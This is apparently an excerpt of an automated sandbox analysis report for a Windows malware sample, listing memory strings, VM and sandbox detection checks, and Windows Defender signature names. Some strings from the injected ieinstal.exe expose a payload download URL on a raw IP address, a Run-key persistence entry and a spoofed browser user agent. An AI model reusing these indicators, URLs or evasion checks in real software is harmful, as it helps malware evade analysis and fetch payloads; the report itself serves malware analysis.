Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: PTABLE)(LAPTOP)(NOTEBOOK)(SUB NOTEBOOK)%S \%D.%D.%D.%D%04X%04XSBIEDLL.DLLDBGHELP.DLLAPI_LOG.
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: QEMU-GA.EXE
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	Binary or memory string: \|ACCESSCHK.EXE\|ACCESSCHK64.EXE\|ACCESSENUM.EXE\|ACRORD32.EXE\|ADEXPLORER.EXE\|ADINSIGHT.EXE\|ADRESTORE.EXE\|APPLICATIONFRAMEHOST.EXE\|APPVCLIENT.EXE\|APPVLP.EXE\|ATBROKER.EXE\|AUDIODG.EXE\|AUTORUNS.EXE\|AUTORUNS64.EXE\|AUTORUNSC.EXE\|AUTORUNSC64.EXE\|BASH.EXE\|BGINFO.EXE\|BGINFO64.EXE\|BITSADMIN.EXE\|BROWSER_BROKER.EXE\|CALC.EXE\|CDB.EXE\|CERTUTIL.EXE\|CLOCKRES.EXE\|CLOCKRES64.EXE\|CMD.EXE\|CMDKEY.EXE\|CMSTP.EXE\|CONHOST.EXE\|CONSENT.EXE\|CONTIG.EXE\|CONTIG64.EXE\|CONTROL.EXE\|COREINFO.EXE\|CSC.EXE\|CSCRIPT.EXE\|CSI.EXE\|CSRSS.EXE\|CTFMON.EXE\|CTRL2CAP.EXE\|DASHOST.EXE\|DATAEXCHANGEHOST.EXE\|DBGVIEW.EXE\|DFSVC.EXE\|DISK2VHD.EXE\|DISKEXT.EXE\|DISKEXT64.EXE\|DISKSHADOW.EXE\|DLLHOST.EXE\|DNSCMD.EXE\|DNX.EXE\|DXCAP.EXE\|ESENTUTL.EXE\|EXPAND.EXE\|EXPLORER.EXE\|EXTEXPORT.EXE\|EXTRAC32.EXE\|FINDLINKS.EXE\|FINDLINKS64.EXE\|FINDSTR.EXE\|FONTDRVHOST.EXE\|FORFILES.EXE\|FXSSVC.EXE\|GPSCRIPT.EXE\|GPUP.EXE\|HANDLE.EXE\|HANDLE64.EXE\|HEX2DEC.EXE\|HEX2DEC64.EXE\|HH.EXE\|IE4UINIT.EXE\|IEEXEC.EXE\|INFDEFAULTINSTALL.EXE\|INSTALLUTIL.EXE\|JUNCTION.EXE\|JUNCTION64.EXE\|LDMDUMP.EXE\|LIVEKD.EXE\|LIVEKD64.EXE\|LOADORD.EXE\|LOADORD64.EXE\|LOADORDC.EXE\|LOADORDC64.EXE\|LOCKAPP.EXE\|LOGONSESSIONS.EXE\|LOGONSESSIONS64.EXE\|LSAISO.EXE\|LSASS.EXE\|MAKECAB.EXE\|MAVINJECT.EXE\|MFTRACE.EXE\|MICROSOFTEDGE.EXE\|MICROSOFTEDGECP.EXE\|MICROSOFTEDGESH.EXE\|MSBUILD.EXE\|MSCONFIG.EXE\|MSDEPLOY.EXE\|MSDT.EXE\|MSDTC.EXE\|MSHTA.EXE\|MSIEXEC.EXE\|MSXSL.EXE\|NETSH.EXE\|NLNOTES.EXE\|NLTEST.EXE\|NOTES.EXE\|NOTMYFAULT.EXE\|NOTMYFAULT64.EXE\|NOTMYFAULTC.EXE\|NOTMYFAULTC64.EXE\|NTFSINFO.EXE\|NTFSINFO64.EXE\|NTOSKRNL.EXE\|NVUDISP.EXE\|NVUHDA6.EXE\|ODBCCONF.EXE\|OPENWITH.EXE\|PAGEDFRG.EXE\|PCALUA.EXE\|PCWRUN.EXE\|PENDMOVES.EXE\|PENDMOVES64.EXE\|PIPELIST.EXE\|PIPELIST64.EXE\|POWERSHELL.EXE\|PRESENTATIONHOST.EXE\|PRINT.EXE\|PROCDUMP.EXE\|PROCDUMP64.EXE\|PROCEXP.EXE\|PROCEXP64.EXE\|PROCMON.EXE\|PSEXEC.EXE\|PSEXEC64.EXE\|PSFILE.EXE\|PSFILE64.EXE\|PSGETSID.EXE\|PSGETSID64.EXE\|PSINFO.EXE\|PSINFO64.EXE\|PSKILL.EXE\|PSKILL64.EXE\|PSLIST.EXE\|PSLIST64.EXE\|PSLOGGEDON.EXE\|PSLOGGEDON64.EXE\|PSLOGLIST.EXE\|PSLOGLIST64.EXE\|PSPASSWD.EXE\|PSPASSWD64.EXE\|PSPING.EXE\|PSPING64.EXE\|PSR.EXE\|PSSERVICE.EXE\|PSSERVICE64.EXE\|PSSHUTDOWN.EXE\|PSSUSPEND.EXE\|PSSUSPEND64.EXE\|PWSH.EXE\|RAMMAP.EXE\|RCSI.EXE\|REG.EXE\|REGASM.EXE\|REGDELNULL.EXE\|REGDELNULL64.EXE\|REGEDIT.EXE\|REGISTER-CIMPROVIDER\|REGJUMP.EXE\|REGSVCS.EXE\|REGSVR32.EXE\|REPLACE.EXE\|ROBOCOPY.EXE\|ROCCAT_SWARM.EXE\|RPCPING.EXE\|RUNDLL32.EXE\|RUNONCE.EXE\|RUNSCRIPTHELPER.EXE\|RUNTIMEBROKER.EXE\|SC.EXE\|SCRIPTRUNNER.EXE\|SDELETE.EXE\|SDELETE64.EXE\|SDIAGNHOST.EXE\|SEARCHFILTERHOST.EXE\|SEARCHINDEXER.EXE\|SEARCHPROTOCOLHOST.EXE\|SECURITYHEALTHSERVICE.EXE\|SERVICES.EXE\|SETTINGSYNCHOST.EXE\|SGRMBROKER.EXE\|SIGCHECK.EXE\|SIGCHECK64.EXE\|SIHOST.EXE\|SMARTSCREEN.EXE\|SMSS.EXE\|SPLWOW64.EXE\|SPOOLSV.EXE\|SPPSVC.EXE\|SQLDUMPER.EXE\|SQLPS.EXE\|SQLTOOLSPS.EXE\|STREAMS.EXE\|STREAMS64.EXE\|SURFACECOLORSERVICE.EXE\|SURFACESERVICE.EXE\|SVCHOST.EXE\|SYNCAPPVPUBLISHINGSERVER.EXE\|SYNCHOST.EXE\|SYSMON.EXE\|SYSMON64.EXE\|SYSTEMSETTINGSBROKER.EXE\|TASKHOSTW.EXE\|TASKMGR.EXE\|TCPVCON.EXE\|TCPVIEW.EXE\|TE.EXE\|TRACKER.EXE\|USBINST.EXE\|VBOXDRVINST.EXE\|VMCOMPUTE.EXE\|VMMAP.EXE\|VMMS.EXE\|VSJITD
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 00000026.00000003.18349219133.00000138BD1CA000.00000004.00000001.sdmp	Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: SNIFFER.EXE
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: IFPROCESSEXISTS("SANDBOXIERPCSS.EXE")ORPROCESSEXISTS("SANDBOXIEDCOMLAUNCH.EXE")THEN
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\COCKFIGHT.EXE\FLGEBREVSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNPERAMELINEHTTP://178.32.63.50/MVBS/HOST_HKVPGVGQ234.BINHTTP://178.32.63.50/BVBS/HOST_HKVPGVGQ234.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXE
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL]
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: DIR_WATCH.DLL
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	Binary or memory string: *.LOG.\|!\FABRICOBSERVER.EXE
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Binary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIERPCSS.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: AZTEKERNES.exe, 00000005.00000002.15127289168.0000000002BD0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSVBVM60.DLL
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	Binary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: AZTEKERNES.exe, 00000005.00000002.15127289168.0000000002BD0000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: SNIFF_HIT.EXE
Source: MpSigStub.exe, 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp	Binary or memory string: FAKEHTTPSERVER.EXE
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE

Tries to detect Any.run

Show sources

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 1936	Thread sleep count: 9975 > 30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 1936	Thread sleep time: -49875s >= -30000s

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Window / User API: threadDelayed 9975

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Thread sleep count: Count: 9975 delay: -5

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 5_2_0040784E rdtsc

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .AVHDX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: ARM_big_endianARM_legacyARM_unpredictable_16bitmachine_32bitmachineaggressive_trim_wsaggressiveimportamd64_imagearm_imageaslr_bit_setbound_imports_inside_imagebyte_reversed_hibyte_reversed_lowcalls_unimplemented_apichecks_if_debugged_documentedchecks_if_debugged_undocumentedchecks_ntglobalflagchecks_processheapchecks_teb_lasterrorchecks_teb_laststatuscode_on_stackdebug_strippeddeep_analysisdeep_apicall_limitdelay_load_imports_inside_imagedetects_virtualpcdetects_vmdetects_vmwaredirty_wx_branchdisable_apicall_limitdisable_drop_mz_onlydisable_dropper_rescandisable_io_redirectiondisable_microcodedisable_seh_limitdisable_static_unpackingdisable_thread_apicall_limitdisable_vmprotectdmg_decompressdmg_entrypointdmg_filealignmentdmg_imagebasedmg_imagesizedmg_importsdmg_invaliddatadmg_machinedmg_not_executable_imagedmg_notcontiguousdmg_optional_magicdmg_overlapping_sectionsdmg_pointertorawdatadmg_relocationsdmg_resource_levelsdmg_resource_namesdmg_resource_offsetdmg_resource_unordereddmg_sectionalignmentdmg_sizeofheadersdmg_sizeofrawdatadmg_special_sectiondmg_truncateddmg_unsupporteddmg_virtualaddressdmg_virtualsizedroppeddt_continue_after_unpackingdt_continue_after_unpacking_damageddt_error_bb_limitdt_error_failed_to_translatedt_error_heur_API_limitdt_error_heur_exit_criteriadt_error_invalid_opcodedt_error_loop_too_complexdt_error_not_enough_memorydt_error_too_many_operandsdt_error_too_many_prefixesdt_error_vmm_page_faultdynmem_APIcalldynmem_checks_if_debugged_docdynmem_checks_if_debugged_undocdynmem_checks_ntglobalflagdynmem_checks_processheapdynmem_detects_virtualpcdynmem_detects_vmdynmem_detects_vmwaredynmem_kernel_scandynmem_reads_vdll_codedynmem_self_modifying_codedynmem_uses_access_violationdynmem_uses_bound_exceptionsdynmem_uses_breakpointsdynmem_uses_div_by_zerodynmem_uses_int_overflowdynmem_uses_invalid_opcodesdynmem_uses_privinstrdynmem_uses_single_steppingdynmem_uses_udbgrddynmem_uses_udbgwrdynmem_uses_unusual_breakpointenable_binlibenable_lshashenable_vmm_growentrybyte55entrybyte60entrybyte90entrypoint_in_headerentrypoint_in_import_tableepatscnstartepatstartentrysectepatstartlastsectepcallnextepinfirstsectepiniatepoutofimageepscn_eqsizesepscn_falignepscn_islastepscn_valignepscn_vfalignepscn_writableepsec_not_executableexecutable_imageexecutble_imageexecutes_from_dynamic_memoryexecutes_from_last_sectionexecutes_from_resourcesextended_pestaticfirstsectwritableforce_dtforce_expensive_processingforce_unpackinggenpackedhandle_large_vahas_checksumhas_delay_load_importshas_many_resourceshas_msilresourceshasappendeddatahasboundimportshasexportshasstandardentryheaderchecksum0hstr_exhaustiveia64_imageimport_via_tlsinv_argumentsinv_datainv_decompress_errorinv_dos_signatureinv_e_lfanewinv_exportsinv_fileinv_filealignmentinv_filesizeinv_imagebaseinv_nomemoryinv_notimplementedinv_nt_signatureinv_optional_magicinv_overlappinginv_rawoffsetinv_rawsizeinv_readinv_rvainv_sectionalignmentinv_sizeofheadersinv_sizeofimageinv_sizeofoptionalheaderinv_unsupported_mac
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	Binary or memory string: MachineInfo isVirtualMachine
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.bin.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: vboxhook.dll
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: vmware-tray.exe
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: MpSigStub.exe, 00000026.00000003.18324900169.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: lbum.exeticket.zipuspsdhlspchPo.php?www=/release/setup.zipexe/release/install./release/new/setup.rar/index.php?c=RaE.scr.pdf..php?receipt_print=.php?receipt=/facebook//info.php?info=/info.php?label=/main.php?label=/main.php?info=/info.php?id=/flash/?/?d=/d/install.exe/index.php?key=.php?id=aJT.php?htm/setup.RPF:FakePAVURLinstall.SIGATTR:LoadsObscureDllRPF:LowFiObscureDllReadRPF:LowFiObfuscatorVM!Themida!CodeVirtualizer!Armadillo!Armadillo_4!Armadillo_5xRPF:DetectsVmWareRPF:DetectsVPCRPF:DetectsVMHSTR:VirTool:Win32/Obfuscator.YVSIGATTR:VirTool:Win32/Obfuscator.YV.2HSTR:Rogue:Win32/FakePAV_lowfiPEBMPAT:Trojan:Win32/Tibs_lowfiHSTR:Rogue:Win32/FakePAV_2_lowfiHSTR:Rogue:Win32/FakePAV_3_lowfianajbio.exesyuy2.exe~!#RPF:KaraganyFilename.BRPF:KaraganyFilename.A\AppData\Roaming\\Application Data\tfn.tmp.exeRPF:SkuffbotFilename.Asvchosts.exeRPF:SkuffbotFilename.BRPF:SkuffbotFilename.C.ps1.vbscod.gpj.gnp.txt.ftr.tpp.piz.rar.slx.fdp.RPF:RLOUnknownExtensionFilenameRPF:RLOFilenameRPF:RLOUnknownExtensionFilenameType1client.dllClient.dllclient_p.dllclient32_p.dllclient64_p.dlld64_p.dllmain_dll.dllinst_dll.dllVncDLL.dllRPF:CarberpVncDLLRPF:VawtrakDLLRPF:UrsnifDLLRPF:SampleCollectRPF:ObfuscatorWU.pif.scrIMG_FacebookRPF:PEWithImageFilename.Askype-imgprofile-imgprofile-facebookimg-facebookImages-Facebookimage-facebookDCIM-IMGSkype.ImageImage.Skypeskype_profilefileqemurecodispljrcgdwgpixbmpRPF:PEWithImageFilename.Bjpgimgapi_irispngr.out.png.exer.in.png.exe.pdfPrologue.Web.PDF.exeRPF:PEWithDocFilename.A.doc.xls.ppt.htmjpegdocxxlsxpptx.html.JPG.zip\RPF:PEWithImageFilename.C%s%s%sRPF:Napolar_Section_NameRPF:SirefefInstallationPathEPaEPbEPd.virus@h
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	Binary or memory string: IsVmWare
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: azurevirtualmachinename
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .AVHD.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .RCT.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: dynmem_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: =8*\|%systemroot%\System32\Vmcompute.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp	Binary or memory string: \vmnet.exe
Source: MpSigStub.exe, 00000026.00000003.18324900169.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=\COCKFIGHT.exe\FLGEBREVSoftware\Microsoft\Windows\CurrentVersion\RunPERAMELINEhttp://178.32.63.50/mvbs/Host_hKVPgVgQ234.binhttp://178.32.63.50/bvbs/Host_hKVPgVgQ234.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: MpSigStub.exe, 00000026.00000003.18305766772.00000138BD36A000.00000004.00000001.sdmp	Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: %qemu
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .HRL.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: .VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: ,Administrator,Guest,vmware
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-aarch64.exe
